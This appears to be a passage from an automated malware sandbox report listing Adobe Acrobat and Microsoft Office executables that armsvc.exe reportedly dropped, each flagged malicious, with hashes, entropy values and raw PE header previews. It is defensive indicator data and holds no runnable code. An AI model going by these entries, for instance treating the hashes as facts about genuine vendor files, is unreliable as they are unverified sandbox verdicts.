Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ z.A...A...A...9...A..O5...A..O5...A..O5...A..O5...A...*...A...A...@..M5...A..M5.A...A...A..M5...A..Rich.A..................PE..d......d.........."..........b.................@.............................. ........... .................................................X...h....p..p....P..t.......................T.......................(.......8............................................text...,........................... ..`.rdata.............................@..@.data........@.......&..............@....pdata..t....P......................@..@.rsrc...p....p.......B..............@..@.reloc....... ......................@...................................................................................................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1339904
Entropy (8bit):	7.200852307538492
Encrypted:	false
SSDEEP:	24576:GjKTIsAjFuvt9fmFthMaT5U8aChaeu4GJ0eeQ2yPyzc+E7xonyVGc/dT5N:GjI/mPh7TT79mJLeQVPyzc+E7xQ2l
MD5:	FCBC3A11A8C5943E3D3747B8BBBD9AA9
SHA1:	59092017157133B05C1C33BA8AA4F51B59F075E8
SHA-256:	E9688DE09152E58A3677530F0C2B79DFBACCD5321436A8D26975A0C82984FCB7
SHA-512:	1FA6F14AD05939E15FDC256F3D19C0B4B6FC60F0352908B33BBFBC4160A7E8A06ECE9D4B008CF7353DAD7A361DA7E1DCFEEF22445A5E53FCF21B6CA207363197
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$......................................s...X............................[....U=....................h...n......n.Y.....1....n......Rich...........PE..d......c..........".................0i.........@..............................$........... .................................................H...d............@..Tx......................p...................`...(...`................................................text............................... ..`.rdata..@...........................@..@.data....>......."..................@....pdata..Tx...@...z..................@..@.rsrc................z..............@..@.reloc..............................@...................................................................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1622016
Entropy (8bit):	5.12522131216621
Encrypted:	false
SSDEEP:	24576:7GqVwCto1Om5WgsGJ0eeQ2yPyzc+E7xonyVGc/dT5N:qZ1OmUkJLeQVPyzc+E7xQ2l
MD5:	137E7AD51FD82CA102C5165A75C83643
SHA1:	05A3BF0CF953763B5785A3E1B97CF7F9C007C657
SHA-256:	46630BA4692684AC35DECC1E77E935510C99BE42AEB1079DE02C9C7D71129E7F
SHA-512:	04CF0D00DE79EA4AD36A7FA37A92DE9BAF8F4BE1D284409F225545E6A74620A7E500ADD55363F273E463B11A1D1333CB65BC1480ABC0C49EE241B1156D346B74
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................v......................................a..X.....X........r....X.....Rich...........PE..d......c.........."............................@..............................#......].... .................................................. ...........v..............................p.......................(....................0...............................text............................... ..`.rdata..Z$...0...&..................@..@.data...x"...`.......@..............@....pdata...............L..............@..@.rsrc....v.......v...j..............@..@.reloc.......0......................@...................................................................................................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1359872
Entropy (8bit):	4.824419982680039
Encrypted:	false
SSDEEP:	24576:vWBWSGJ0eeQ2yPyzc+E7xonyVGc/dT5N:jJLeQVPyzc+E7xQ2l
MD5:	682F582DCF554BB600D83BB3F395507E
SHA1:	E852648AC3439F6FD5533779B1174DE09542CD6A
SHA-256:	735155B24969CA0FAE7A93D2AFDA17DA7BD64513CD38A55828A88704513C8246
SHA-512:	C510A0C9DC7CBE9589DD5261038CAF60DDC09A61827368C41D854DE44E0151A9D9672FC86D6EF567F8AF6209612F3B138D65213A1A1C4C8BE28D603AFEF11BF7
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1.v.Pc%.Pc%.Pc%.(.%.Pc%C$g$.Pc%C$`$.Pc%C$f$.Pc%C$b$.Pc%.;g$.Pc%.;b$.Pc%.Pb%EPc%z$f$.Pc%z$.%.Pc%.P.%.Pc%z$a$.Pc%Rich.Pc%................PE..d...DC,d.........."............................@....................................?..... .................................................h...@.......@............................Q..T....................S..(... R..8............0...............................text............................... ..`.rdata..$....0......................@..@.data...............................@....pdata..............................@..@.rsrc...@...........................@..@.reloc..............................@...........................................................................................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1683968
Entropy (8bit):	7.221615376801191
Encrypted:	false
SSDEEP:	49152:p+GtCi27mVdyT+a0wJLeQVPyzc+E7xQ2l:cmd27V1vcbE7xQ2l
MD5:	AF4064BF32EC987F7E907713AE168824
SHA1:	D497340E68B96D457FF16A5B7F27C90FC44907F7
SHA-256:	F27387FA10FD400D80F031BE32FBBF283C1152CF9329A347571A48B8B4D57C39
SHA-512:	53EB50D9DC4EB42D31DA1B964E5A46F2FABFAF3D0FEA7D75EF978061EE0E6FC6BE6537C84C13BC11580AD0F458278294F3354F11B81DDE3BE83B8574B1166908
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........ ..N...N...N......N.e.K...N...O...N...J...N...M...N...H...N...K...N...#...N.<~3...N..C3...N...O...N...O.O.N...F...N.......N......N...L...N.Rich..N.................PE..d...%..c.........."......j...t......@..........@.......................................... .................................................x........... ....p..dt......................p.......................(... ...8............................................text...kh.......j.................. ..`.rdata...............n..............@..@.data...`S.......F..................@....pdata..dt...p...v...D..............@..@.rsrc... ...........................@..@.reloc..............................@...........................................................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	3110912
Entropy (8bit):	6.647041563944508
Encrypted:	false
SSDEEP:	49152:zU198PzqkltcT0gViqNfBZQiOIK5Ns6YZ82PTJeYrJLeQVPyzc+E7xQ2l:E9NfHOIK5Ns6qR9F1vcbE7xQ2l
MD5:	EC2668E0EF1D4A79DC086E41D4B2E764
SHA1:	0E5BCA2FAA3320AF718C322492819AFA55AAC194
SHA-256:	6904E6442675DA2AF543E73246DE032C490E6148C43B814E93363ECD1EF2CD98
SHA-512:	9E50E8BC429C2125DE05045D4A28CF33C7FB24B0EA31586A34A52CCA92A72E3579F8EEA3848382E9A508E2BF1FEFE61749720AF8E887203E0456BE261B7EBBB0
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......'A3rc ]!c ]!c ]!..!h ]!..!. ]!..!x ]!1UY r ]!1U^ i ]!.O.!a ]!..!g ]!..!b ]!1UX . ]!..!@ ]!.UX . ]!c \!.!]!.UT . ]!.U.!b ]!c .!b ]!.U_ b ]!Richc ]!................PE..d.....Zd..........".................t..........@..............................0......"0... ..................................................o .......&......$.`....................x..p....................y..(....)..8....................j .@....................text............................... ..`.rdata..8...........................@..@.data....q.... ..<...r .............@....pdata..`.....$.......#.............@..@_RDATA........&.......%.............@..@.rsrc........&.......%.............@..@.reloc...@....&..0...H&.............@...................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1694720
Entropy (8bit):	5.254202617263401
Encrypted:	false
SSDEEP:	24576:SkIWTUQcydcGJ0eeQ2yPyzc+E7xonyVGc/dT5N:SxKU4JLeQVPyzc+E7xQ2l
MD5:	F0D322E5D52AA3F19C9DB8865916CCEC
SHA1:	820F7D458392DAAF947E210D161DCDDE083BC690
SHA-256:	283CA10A167DC1CCD5B3C90BA2223AD8A581C3C328FC45F254B2DB601EE0AFF6
SHA-512:	58291A665DF19B6392DF3B360E9A6CEB766EBA2340769C803D9F69C87B4246D66D50664E7B9C6EA73E745DF76927EC4DEB1D986D08CE583BC281A8BD83D2EDB5
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0I..Q'..Q'..Q'..7#..Q'..7$..Q'..7".!Q'..$#..Q'..$$..Q'..7&..Q'..$"..Q'.x$"..Q'..Q&.dQ'.x$...Q'.x$...Q'..Q...Q'.x$%..Q'.Rich.Q'.........................PE..d.....Zd.........."......,..........(?.........@.............................0$......P.... .................................................(...P................m..................tC..p...........................p...8............@..........@....................text....+.......,.................. ..`.rdata......@.......0..............@..@.data....)..........................@....pdata...m.......n..................@..@_RDATA...............B..............@..@.rsrc................D..............@..@.reloc.......@......................@...................................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1444864
Entropy (8bit):	5.0296604713833615
Encrypted:	false
SSDEEP:	24576:WO+qBlGJ0eeQ2yPyzc+E7xonyVGc/dT5N:J+vJLeQVPyzc+E7xQ2l
MD5:	4227D2852A35FF7AB47B6DC98266BA3B
SHA1:	9520106C32E0E885F4D792166FD7F0C3EDB9C0C0
SHA-256:	BCEC67793ACB20880DE64EAF047CEC3CFCFD5E32442EB4B40A1AA5E33EB27078
SHA-512:	3D4454145B00E2B11EF4ED0D6A66388B6DBFE427FC8B53FCC2DDC49E9DC790615291BA0554EBF0DC53A676306454F93721AA41DC157033A2CB4361E4A9B00CC3
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......K..*...y...y...y...y...y..x...y..x...y..x...y..x-..y..Ey...yb.x...y...y..yN.x...yN.}y...yN.x...yRich...y........PE..L...<..[................. ...................0....@..........................@ ......U..............................................0...............................J..p....................K.......J..@............0...............................text... ........ .................. ..`.rdata.......0.......$..............@..@.data....E.......B..................@....rsrc........0......................@..@.reloc.......@......................@...................................................................................................................................................................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1249792
Entropy (8bit):	4.667593050633481
Encrypted:	false
SSDEEP:	12288:gGJ0T3yeQ28W2xzLy+yjupYvLJc+qX7xOTxzzy8gGcGwSMTWpwN:gGJ0eeQ2yPyzc+E7xonyVGc/dT5N
MD5:	EC366720B504ECF20FAED6CB138B993D
SHA1:	A14BB2D5D4E023D036DB95F26B4FED94063B216C
SHA-256:	66794A1B09785CBAE629EEDB972AD9163D57976247067BA5D7380D57233E8F01
SHA-512:	F4BC552FE20F762168818BAF4B6E1366C8AD900DB35408D8A04092D8B80355146253BB548CD94585A96DAB7B7EBBBA265E7CDE55E5A7A9F86C3A094DCBDDC4E4
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................+.............................................................G.............Rich............................PE..d...~^.c.........."..........$......p..........@.............................`............ ..................................................;.......p.......`......................d4..p............................4..8............0..0............................text...\|........................... ..`.rdata.......0......................@..@.data........P.......,..............@....pdata.......`......................@..@.rsrc........p.......0..............@..@.reloc...............2..............@...................................................................................................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1268224
Entropy (8bit):	4.695894809391895
Encrypted:	false
SSDEEP:	12288:FnGJ0T3yeQ28W2xzLy+yjupYvLJc+qX7xOTxzzy8gGcGwSMTWpwN:RGJ0eeQ2yPyzc+E7xonyVGc/dT5N
MD5:	C874B782DC216C2CADEEF293ACD77DBA
SHA1:	72716FD2B8D4C0CC55D7707729028267A7B4AD6F
SHA-256:	F21B9A12406A6E588EB6BD4ED4C665714A9CF120E8CA921FFDAE5095EA258EC3
SHA-512:	86C9F31027ECCCE431B04924D87D6C4E1A63C3E3B8D30DC17A4CEB01A8B38C28F8B7BCDDCD57172D4AD27586D8849D4D2B9E971BCE5B9DFF63A9A4C3F652C77D
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2\.v=..v=..v=...E?.x=..I..\|=..I..u=..I..j=..I..p=..bV..q=..v=...=..I..t=..IS.w=..v=;.w=..I..w=..Richv=..........................PE..d....^.c.........."......<...B.......>.........@....................................n..... ..................................................i..........P.......,...................`X..T............................X..8............P...............................text....;.......<.................. ..`.rdata..$'...P...(...@..............@..@.data................h..............@....pdata..,............l..............@..@.rsrc...P............r..............@..@.reloc...............z..............@...........................................................................................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	4151808
Entropy (8bit):	6.496898623916114
Encrypted:	false
SSDEEP:	49152:ituUC0nNc/RcYHCY9AWWnUOqdHIEogMAYrukdUmSC+bXMZQU1QqpN755RJLeQVP5:ijEIa3HIEWOc5L1vcbE7xQ2l
MD5:	3E98CE7BF90290D4261B66C273184506
SHA1:	9EE69EF0EDE139FA374BA5439526012F7678D4C2
SHA-256:	4729BDA8594D75CE70AD77EB41670C9A3888CB453D2DC81CA5C0DC0E8096C09C
SHA-512:	6961481671FA6111CF1A4401BA7F9AD38B7621DA71F8B3AB37A125967EB6B9913C8337B1539E140824CA27C0B275EFBD509E3DAF14A317C948E553C97E502978
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$........x...............r.......r.......r.......v$.....>m......>m......>m.......r...............r..............<m......<m......<m&.......N.....<m......Rich............................PE..d...<..d.........."......:....................@............................. @.......@... .........................................0.%.......%......0)......p'.......................!.T.....................!.(....s .8............P......l.%......................text....8.......:.................. ..`.rdata.......P.......>..............@..@.data....D... &.......&.............@....pdata.......p'.......&.............@..@.didat........).......(.............@..._RDATA....... ).......(.............@..@.rsrc........0).......(.............@..@.reloc...@....6..0...*6.............@...................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	59941376
Entropy (8bit):	7.999357812672546
Encrypted:	true
SSDEEP:	1572864:DQb5m2CYw2bheyHA2DiAVPNqCPiQwm9tqGWS15Vj9QVqd2+NAsH:UXhwMhe6AABPiQwF6xQ22Rg
MD5:	FBFCE69B548291E601CD57EB2A009C5D
SHA1:	65E2C230373423966729BAC7E9DBE4DB208F35C5
SHA-256:	F2B30B44D90CDA3976C41529F91B44E4427CD6544B6B318A6D61524FBFAA2994
SHA-512:	C6910FABF66B1C2AB3915AA0AC3DCF88CB7A94EE3930C5628B0438B89365DC3794857A2DC9E46E07133E2D7CDC72BD9D93EBFD3614BF5A4D9FADD5A4323F6DC2
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;......J...J...Jk.Kt..Jk.Kl..Jk.K..J..Kn..J..Ku..J..K+..Jk.Kt..J...J..J..Kf..J..Kt..J..@J~..J..(J}..J..K~..JRich...J................PE..d...z..d..........".................3.........@.............................0.......j.... .....................................................x....`.........06..................8%..T....................&..(...Pg..8............ ......@...@....................text............................... ..`.rdata...}... ...~..................@..@.data...TS..........................@....pdata..06.......8..................@..@.didat..x....@......................@..._RDATA.......P......................@..@.rsrc.......`.....................@..@.reloc.......@.....................@...................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1336832
Entropy (8bit):	4.843691316586923
Encrypted:	false
SSDEEP:	24576:GjkYuZGJ0eeQ2yPyzc+E7xonyVGc/dT5N:O/uUJLeQVPyzc+E7xQ2l
MD5:	E05290D5A475EE58F687E699C389BC70
SHA1:	C9BD60C577A8BA5EBCCE98BB48305549734BE948
SHA-256:	25215559DE1C4B8F5B991FD29B7A87605965772B0A7F0685567B862E9F0E5694
SHA-512:	C0BED0F7D97D6A8736A86CA1C4CFA8FB365D626208D12774E917EA7FB54215BD8B5B8634719A3111E9236E8D2E676C68AEE673088E599A766F907072F2CE8242
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................b....6......6......6.....6.....................M..4......4......4........f....4.....Rich...........................PE..L.....{d.................&...`...............@....@..................................&.......................................r..,................................... O..p....................P.......O..@............@..4............................text....%.......&.................. ..`.rdata...@...@...B...*..............@..@.data................l..............@....rsrc................p..............@..@.reloc...............v..............@...................................................................................................................................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1491456
Entropy (8bit):	5.0655249473002755
Encrypted:	false
SSDEEP:	24576:MxwSJzkrmZsdGJ0eeQ2yPyzc+E7xonyVGc/dT5N:MyIkrKsoJLeQVPyzc+E7xQ2l
MD5:	31BFA14A7571DD66AFDAECA51127EC3F
SHA1:	11F97F4033B94967B4053A65E6EE3EF1DD741EDD
SHA-256:	FF7D920A4185AC4CA76C7977ADAED194BFBF44D84F9BEBFFD0CA1A69666D5F4C
SHA-512:	6855429BA104AB76E0A54B8F341308CC4F9B6402DCC3B04F0203E98DE7680BC5CC8176BDBD7CF185DDDC18F09D81C54189791564021EE7C156E6B467C857F79B
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................y...5.......5.....5......7.......................7.....7.Z....2...7.....Rich..........................PE..d.....{d.........."..........<.......&.........@..............................!......#.... .................................................`...x.... ..............................`j..p....................l..(....j..8............................................text...l........................... ..`.rdata..............................@..@.data...4#..........................@....pdata........... ..................@..@_RDATA..............................@..@.rsrc........ ......................@..@.reloc.......0......................@...................................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1755648
Entropy (8bit):	5.362132667845523
Encrypted:	false
SSDEEP:	24576:CHQJLIRZvsnNqGJ0eeQ2yPyzc+E7xonyVGc/dT5N:CHQJLy49JLeQVPyzc+E7xQ2l
MD5:	E9A5D2773EA4514F8AC304446A68549A
SHA1:	8CB4F05513CCAFFED7E01B4B7FBFFF627A750D59
SHA-256:	81D30ACCCAA32FE6BAFBC9DB4F108DE4F2437CF137CD16F2C621227915EEEC27
SHA-512:	0C13F540C0202B2C2C5C9BB0B6D5D4FA0AE1AA2EDAA6245385D793314BBDFB9D2463B1233535DC934FAE93DC196735DE1890B6BE0099D0171B2CD80C3927BB1F
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........L<."o."o."o...o.."o+.&n.."o+.!n.."o+.#n."o+.'n."o..$n."o..#n.."o).+n.."o.#o;."o).'n."o)..o."o). n."oRich."o........PE..d......d.........."......\.....................@............................. %......l.... .................................................."..@....0...........W..................x...T.......................(...`...8............p..........`....................text....[.......\.................. ..`.rdata.......p.......`..............@..@.data....^...P...R...2..............@....pdata...W.......X..................@..@.didat..8...........................@....msvcjmc..... ......................@....rsrc........0......................@..@.reloc.......@......................@...................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	5365760
Entropy (8bit):	6.447829989550791
Encrypted:	false
SSDEEP:	49152:kUZujDjDjDjXmXgoz2PsapFQr97dRpqbeE8U2Izwot+bdro4O8b8ITDnlggyJ1kx:PWmXL6DE97dRpKuoQbgS1vcbE7xQ2l
MD5:	7616060CF043379D270020602C5C1375
SHA1:	D0A33E1AB91E471C990FA6EA03A78C6554B7B35E
SHA-256:	5AA534E0A95E23B4EFA4720506E5097CAC99D6D32BD53D5D5A8D1A0D5693E6B9
SHA-512:	7291C83A9532827F2C4D20659795298AFA529A05807254F5112DE4060521E5E5CCC35EF9C1D27B3362EF24D342183D108B208C24CFCCB3E838D24000925F9357
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........I.~.(g-.(g-.(g-.Cd,.(g-.Cb,i(g-.G.-.(g-b\c,.(g-b\d,.(g-.t.-.(g-.(g-C(g-b\b,.(g-.Cc,.(g-.Ca,.(g-.Cf,.(g-.(f-.+g-`\b,.(g-`\g,.(g-`\.-.(g-.(.-.(g-`\e,.(g-Rich.(g-........PE..L......d.........."......./..p......P"%.......0...@...........................R.......R..............................@:......@:.......;..V...........................^6.T...................._6.....h.5.@.............0...... :.`....................text...*./......./................. ..`.rdata..Ze....0..f....0.............@..@.data....E....:......h:.............@....didat........;......B;.............@....rsrc....V....;..X...H;.............@..@.reloc...P...@G..@....F.............@...........................................................................................................................................................................................................................

C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3163136
Entropy (8bit):	7.971528501087099
Encrypted:	false
SSDEEP:	98304:drZ23AbsK6Ro022JjL2WEiVqJZx1vcbE7xQ2l:RJADmmxL2WEoCZx8m9
MD5:	B340163BAF68C42443211E7F1F1DB8FD
SHA1:	40D59B7AD87418BDEC4A895DF8C994CCD79A6196
SHA-256:	D609839CA9C23B342082BBD9C8765978DA5EA4029A58D5D4429DAC7317FD6B6E
SHA-512:	DE0F3B31289B13BC325F8681D36FBA1212C4072372ADE09F79EA1C6A151F4038487697B70AA51A66D78D1030C7F62077843DAA098F78C609140958A940104BD7
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5{.!q..rq..rq..rq..r...rQc.r`..rQc.r`..rQc.rp..rQc.rp..rRichq..r........................PE..L.....A.................~... .......^... ........... ........................1..... ]0.......... .....................................0............................!............................................... ...............................text....\|... ...~.................. ..`.data...............................@....rsrc...../......./.................@...................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1213440
Entropy (8bit):	7.195972985337056
Encrypted:	false
SSDEEP:	24576:+frYY42wd7hlOE9fpkEE64tGJ0eeQ2yPyzc+E7xonyVGc/dT5N://9xrSYJLeQVPyzc+E7xQ2l
MD5:	87F91F16D71D094E49B989DDAD007596
SHA1:	E8BF386C3C036901021F7862C2EC63E2A1CE65E0
SHA-256:	0F0D13D3294EDF04029D12A449608FBB39AFB8441338FEE41DBEAD1DB9DFB40E
SHA-512:	46C2369AFA0C0A7A532126037B678547F16FAFAB6E7219A6E86D424AC7C44A2609C200F5379FF4E07E3117CDDDA183C54C43B3A53FF5852A692B3F051567382F
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......@......T...T...T...U...T...U...T..U...T..U...T...U...T..U...T...U...T...Tf..T..U...T..T...T..uT...T..U...TRich...T................PE..d.....{d..........#......J...........3.........@............................. ............ ..................................................L.......`..........(J..................p...T.......................(... B..8............`.......I..`....................text....H.......J.................. ..`.rdata..d....`.......N..............@..@.data...(w...p...&...^..............@....pdata..(J.......L..................@..@.didat.......@......................@..._RDATA.......P......................@..@.rsrc........`......................@...................................................................................................................................................................................................

C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1495040
Entropy (8bit):	4.965308218727557
Encrypted:	false
SSDEEP:	24576:AzNKU/5UGJ0eeQ2yPyzc+E7xonyVGc/dT5N:AzNr/5LJLeQVPyzc+E7xQ2l
MD5:	FA6541EBBF54000C91DD07B3F6A416D5
SHA1:	C77FE80A22F8168159DF401D0CEDCC91011D2BD8
SHA-256:	9343EC84067394113D20A17C64FEA79F555C69A2CC5D6DB4DA314C5F92C79528
SHA-512:	8FFFEE96D00589CD79AF7ABE817EFF3B3FCA75866633C24C96B25C4EDD256B5858E2441C00023A1470ACB8E4CEBE94A58CF0CE09707487B4F34EC3CB2FBD5426
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........E@..$...$...$...\...$...V*..$...V-..$...V+..$...V/..$...$/.0 ...V&..$...V..$...V..$...V,..$..Rich.$..........PE..d...!!.R.........."......`..........0C.........@.............................. ........... .......... ......................................Xl..........X.......d.......................T...................8...(.......8...........`...`............................text...(X.......`.................. ..`.rdata..z....p... ...p..............@..@.data...............................@....pdata..d........ ..................@..@.rsrc...X...........................@..@.reloc..............................@...................................................................................................................................................................................................................................................................

C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	5855744
Entropy (8bit):	6.572240932947478
Encrypted:	false
SSDEEP:	98304:LALuzDKnxCp3JKCrPJzruaI6HMaJTtGb21vcbE7xQ2l:MaGg3cuPIaI6HMaJTtGb28m9
MD5:	49381C9A646DAD39258BA032F53F7C5C
SHA1:	64FABB9FF96764FCA7FC121210F0ED37C0B655FA
SHA-256:	E7982A8033B1D01C8AB740A439266EB49A5B6207416C03B2E8AEEF613A92C54E
SHA-512:	7E07112950A4DC43395D009F70C01A9D652913B7A9FD43432D20BDB9550AD2448600589D89EAD6EE52B2CAE0AA16A3F82929714CB8D3077169AA95E532E02330
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......Jc.M.............p......nx......nx......).......)........p.......p.......p..&....p..............nx..i...kx......kx......kx..g...kxx.............kx......Rich....................PE..d....".e..........".... .z6..........32........@..............................Y.......Y... .................................................8.B.......K..a...PI..%..................0.B.8...................X.B.(.....7.@.............6.0.....B......................text....y6......z6................. ..`.rdata..5.....6......~6.............@..@.data...`....0G.......G.............@....pdata...%...PI..&...:I.............@..@.didat.. .....K......`K.............@..._RDATA..\.....K......fK.............@..@.rsrc....a....K..b...hK.............@..@.reloc........P.......O.............@...................................................................................................................

C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1419264
Entropy (8bit):	5.026610245211874
Encrypted:	false
SSDEEP:	24576:7Xr/SVAxWxGJ0eeQ2yPyzc+E7xonyVGc/dT5N:PNxxJLeQVPyzc+E7xQ2l
MD5:	5231925D839C4D6788F3B7232C75C1A0
SHA1:	E5AB4A5F4946C335CEA70C731384DD09155D3DDB
SHA-256:	84BF0958D8156582DCE714F58148F9AC0C0840A42651C3D8D1A483ED0D6760DD
SHA-512:	87C3ADB94E3053D5B8A3D01DAEEEE6A0E48247C093790AC72BEBF55973417ED67EE8E458062FAAACEACC57A27EA9627059CC3793777525A8A717C1FC56037F60
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........K.k...k...k.......k.......k.......k.......k...k..Ro.......k....l..k.......k....n..k.......k..Rich.k..........PE..L...9.A/.....................T......@V............@.............................................. ......................................8............................_..T...............................@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...8...........................@..@.reloc..............................@...........................................................................................................................................................................................................................................................................................................................

C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	27533312
Entropy (8bit):	6.248104479826709
